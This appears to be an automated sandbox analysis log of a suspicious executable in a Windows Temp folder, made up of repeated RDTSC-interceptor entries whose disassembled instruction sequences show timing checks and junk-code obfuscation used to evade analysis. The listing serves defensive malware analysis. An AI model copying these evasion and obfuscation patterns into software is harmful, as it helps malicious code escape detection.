                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EFFC5 second address: 7F0046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007FAF7CBD5D38h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 jmp 00007FAF7CBD5D46h 0x00000026 call 00007FAF7CBD5D3Fh 0x0000002b pop edi 0x0000002c push 00000000h 0x0000002e mov edi, esi 0x00000030 push 00000000h 0x00000032 jo 00007FAF7CBD5D4Fh 0x00000038 jmp 00007FAF7CBD5D49h 0x0000003d xchg eax, esi 0x0000003e jp 00007FAF7CBD5D54h 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F20CE second address: 7F2138 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D381Ah] 0x00000012 movsx ebx, si 0x00000015 push 00000000h 0x00000017 mov di, C33Bh 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push ebx 0x00000020 call 00007FAF7C6A41A8h 0x00000025 pop ebx 0x00000026 mov dword ptr [esp+04h], ebx 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc ebx 0x00000033 push ebx 0x00000034 ret 0x00000035 pop ebx 0x00000036 ret 0x00000037 mov bx, ax 0x0000003a or dword ptr [ebp+122D30CEh], esi 0x00000040 xchg eax, esi 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FAF7C6A41AFh 0x00000048 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F2138 second address: 7F2153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D47h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F2153 second address: 7F2165 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FAF7C6A41A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F2165 second address: 7F2169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F602E second address: 7F603E instructions: 0x00000000 rdtsc 0x00000002 jne 00007FAF7C6A41A8h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F603E second address: 7F605A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007FAF7CBD5D3Eh 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F605A second address: 7F6069 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jp 00007FAF7C6A41A6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F6069 second address: 7F606D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F9669 second address: 7F966D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7ABBB9 second address: 7ABBD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D48h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7ABBD8 second address: 7ABBF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F9C2E second address: 7F9C34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F9C34 second address: 7F9CA3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41ACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jmp 00007FAF7C6A41AAh 0x00000010 pop ebx 0x00000011 nop 0x00000012 sub dword ptr [ebp+1245AF19h], edx 0x00000018 push edi 0x00000019 pushad 0x0000001a mov edi, dword ptr [ebp+122D21D9h] 0x00000020 mov dword ptr [ebp+122D30C2h], ecx 0x00000026 popad 0x00000027 pop edi 0x00000028 push 00000000h 0x0000002a stc 0x0000002b push 00000000h 0x0000002d mov ebx, dword ptr [ebp+122D36A2h] 0x00000033 xchg eax, esi 0x00000034 pushad 0x00000035 jmp 00007FAF7C6A41B6h 0x0000003a push esi 0x0000003b jo 00007FAF7C6A41A6h 0x00000041 pop esi 0x00000042 popad 0x00000043 push eax 0x00000044 push eax 0x00000045 push edx 0x00000046 ja 00007FAF7C6A41ACh 0x0000004c jnl 00007FAF7C6A41A6h 0x00000052 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FAC13 second address: 7FAC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FAF7CBD5D36h 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007FAF7CBD5D38h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000015h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 pushad 0x0000002a adc ch, 0000007Dh 0x0000002d or eax, dword ptr [ebp+122D20B0h] 0x00000033 popad 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ecx 0x00000039 call 00007FAF7CBD5D38h 0x0000003e pop ecx 0x0000003f mov dword ptr [esp+04h], ecx 0x00000043 add dword ptr [esp+04h], 00000018h 0x0000004b inc ecx 0x0000004c push ecx 0x0000004d ret 0x0000004e pop ecx 0x0000004f ret 0x00000050 mov bh, C5h 0x00000052 push 00000000h 0x00000054 movzx ebx, cx 0x00000057 xchg eax, esi 0x00000058 jmp 00007FAF7CBD5D44h 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push edi 0x00000061 push eax 0x00000062 push edx 0x00000063 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FAC8E second address: 7FAC93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FAC93 second address: 7FACA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D3Dh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FBD54 second address: 7FBD5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FBD5C second address: 7FBD60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FBD60 second address: 7FBD64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FCC7A second address: 7FCCDF instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAF7CBD5D45h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FAF7CBD5D3Dh 0x00000010 nop 0x00000011 jnl 00007FAF7CBD5D3Ch 0x00000017 push 00000000h 0x00000019 mov bl, ah 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007FAF7CBD5D38h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Ch 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 cmc 0x00000038 push eax 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FCCDF second address: 7FCCE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FDC05 second address: 7FDC0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FDC0B second address: 7FDC0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FDC0F second address: 7FDC31 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 sub di, 6EFAh 0x0000000e push 00000000h 0x00000010 pushad 0x00000011 sub di, AC00h 0x00000016 stc 0x00000017 popad 0x00000018 push 00000000h 0x0000001a mov bl, 9Bh 0x0000001c xchg eax, esi 0x0000001d push ebx 0x0000001e push eax 0x0000001f push edx 0x00000020 push edi 0x00000021 pop edi 0x00000022 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FDC31 second address: 7FDC53 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push edi 0x0000000c pop edi 0x0000000d jmp 00007FAF7C6A41B4h 0x00000012 popad 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 803CA5 second address: 803CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAF7CBD5D36h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007FAF7CBD5D48h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 806A18 second address: 806A1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 806A1C second address: 806A24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 806A24 second address: 806A55 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41B4h 0x00000009 jmp 00007FAF7C6A41B9h 0x0000000e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 806BB8 second address: 806BCE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D42h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 806BCE second address: 806BF2 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007FAF7C6A41B5h 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 806BF2 second address: 806BF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 80E3A5 second address: 80E3CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e jmp 00007FAF7C6A41B7h 0x00000013 pop edx 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 80E3CB second address: 80E3DE instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FAF7CBD5D38h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 80E3DE second address: 80E3FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FAF7C6A41ACh 0x0000000c popad 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 jl 00007FAF7C6A41B0h 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81313D second address: 81318A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7CBD5D3Fh 0x00000009 popad 0x0000000a jmp 00007FAF7CBD5D45h 0x0000000f push ecx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 jmp 00007FAF7CBD5D45h 0x00000019 jnc 00007FAF7CBD5D36h 0x0000001f pushad 0x00000020 popad 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 812419 second address: 81244E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jnp 00007FAF7C6A41A8h 0x0000000b pushad 0x0000000c popad 0x0000000d push ebx 0x0000000e pushad 0x0000000f jbe 00007FAF7C6A41A6h 0x00000015 push edx 0x00000016 pop edx 0x00000017 jmp 00007FAF7C6A41B4h 0x0000001c popad 0x0000001d pushad 0x0000001e jc 00007FAF7C6A41A6h 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 812CCF second address: 812CD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 812CD3 second address: 812CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 812CDB second address: 812D03 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnc 00007FAF7CBD5D36h 0x0000000b jl 00007FAF7CBD5D36h 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 ja 00007FAF7CBD5D49h 0x0000001a pushad 0x0000001b jmp 00007FAF7CBD5D3Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81472E second address: 814738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007FAF7C6A41A6h 0x0000000a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 814738 second address: 81473E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7EDAD6 second address: 7EDB6A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+122D18CFh], edx 0x00000012 push dword ptr fs:[00000000h] 0x00000019 push 00000000h 0x0000001b push edi 0x0000001c call 00007FAF7C6A41A8h 0x00000021 pop edi 0x00000022 mov dword ptr [esp+04h], edi 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edi 0x0000002f push edi 0x00000030 ret 0x00000031 pop edi 0x00000032 ret 0x00000033 movsx ebx, di 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d jc 00007FAF7C6A41ACh 0x00000043 mov edi, dword ptr [ebp+122D3622h] 0x00000049 mov eax, dword ptr [ebp+122D0605h] 0x0000004f push 00000000h 0x00000051 push edx 0x00000052 call 00007FAF7C6A41A8h 0x00000057 pop edx 0x00000058 mov dword ptr [esp+04h], edx 0x0000005c add dword ptr [esp+04h], 00000019h 0x00000064 inc edx 0x00000065 push edx 0x00000066 ret 0x00000067 pop edx 0x00000068 ret 0x00000069 clc 0x0000006a push FFFFFFFFh 0x0000006c add dword ptr [ebp+122D2860h], edx 0x00000072 push eax 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 push edx 0x00000077 pop edx 0x00000078 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F122C second address: 7F1230 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F1230 second address: 7F1236 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F3134 second address: 7F313A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F313A second address: 7F313E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F3210 second address: 7F3231 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7CBD5D3Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jbe 00007FAF7CBD5D38h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7F67C2 second address: 7F684B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FAF7C6A41B2h 0x0000000b popad 0x0000000c nop 0x0000000d mov ebx, edx 0x0000000f push dword ptr fs:[00000000h] 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007FAF7C6A41A8h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 push 00000000h 0x00000039 push edx 0x0000003a call 00007FAF7C6A41A8h 0x0000003f pop edx 0x00000040 mov dword ptr [esp+04h], edx 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edx 0x0000004d push edx 0x0000004e ret 0x0000004f pop edx 0x00000050 ret 0x00000051 mov eax, dword ptr [ebp+122D059Dh] 0x00000057 mov edi, dword ptr [ebp+122D2A8Ch] 0x0000005d push FFFFFFFFh 0x0000005f mov bx, 8250h 0x00000063 nop 0x00000064 pushad 0x00000065 push edi 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FBE83 second address: 7FBF17 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAF7CBD5D38h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push eax 0x00000010 call 00007FAF7CBD5D38h 0x00000015 pop eax 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a add dword ptr [esp+04h], 0000001Dh 0x00000022 inc eax 0x00000023 push eax 0x00000024 ret 0x00000025 pop eax 0x00000026 ret 0x00000027 jmp 00007FAF7CBD5D3Fh 0x0000002c push dword ptr fs:[00000000h] 0x00000033 mov di, dx 0x00000036 mov dword ptr fs:[00000000h], esp 0x0000003d mov edi, 13DFC2ABh 0x00000042 mov eax, dword ptr [ebp+122D08ADh] 0x00000048 jns 00007FAF7CBD5D3Bh 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007FAF7CBD5D38h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 00000019h 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a nop 0x0000006b push eax 0x0000006c push edx 0x0000006d pushad 0x0000006e pushad 0x0000006f popad 0x00000070 push eax 0x00000071 pop eax 0x00000072 popad 0x00000073 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FBF17 second address: 7FBF34 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FAF7C6A41A6h 0x00000009 jne 00007FAF7C6A41A6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push ebx 0x00000016 jg 00007FAF7C6A41A6h 0x0000001c pop ebx 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FBF34 second address: 7FBF4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7CBD5D42h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FDD9D second address: 7FDDAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAF7C6A41AAh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 7FEE64 second address: 7FEE91 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAF7CBD5D38h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FAF7CBD5D46h 0x00000013 jp 00007FAF7CBD5D36h 0x00000019 popad 0x0000001a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B7F2 second address: 81B7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81A4EF second address: 81A4F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81AA73 second address: 81AA9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAF7C6A41AFh 0x00000007 jmp 00007FAF7C6A41ABh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FAF7C6A41B2h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81AA9B second address: 81AAA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81AAA1 second address: 81AAAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAF7C6A41AAh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81AC3C second address: 81AC72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FAF7CBD5D47h 0x0000000a pushad 0x0000000b jmp 00007FAF7CBD5D41h 0x00000010 jne 00007FAF7CBD5D36h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81A201 second address: 81A205 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B091 second address: 81B0A1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnl 00007FAF7CBD5D36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeRDTSC instruction interceptor: First address: 81B0A1 second address: 81B0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
